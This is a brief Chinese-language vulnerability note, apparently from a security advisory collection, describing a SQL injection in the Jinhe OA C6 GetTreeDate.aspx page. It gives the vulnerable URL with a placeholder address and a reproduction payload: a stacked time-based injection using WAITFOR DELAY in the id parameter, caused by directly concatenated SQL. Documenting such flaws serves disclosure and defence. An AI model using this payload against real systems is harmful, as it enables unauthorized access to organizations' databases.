本页总览金和OAC6-GetTreeDate.aspxsql注入漏洞1. 漏洞链接http://xx.xx.xx.xx/C6/Jhsoft.Web.users/GetTreeDate.aspx/?id=12. 复现步骤http://xx.xx.xx.xx/C6/Jhsoft.Web.users/GetTreeDate.aspx/?id=1%3bWAITFOR+DELAY+'0%3a0%3a5'+--%20and%201=1直接拼接sql语句导致注入产生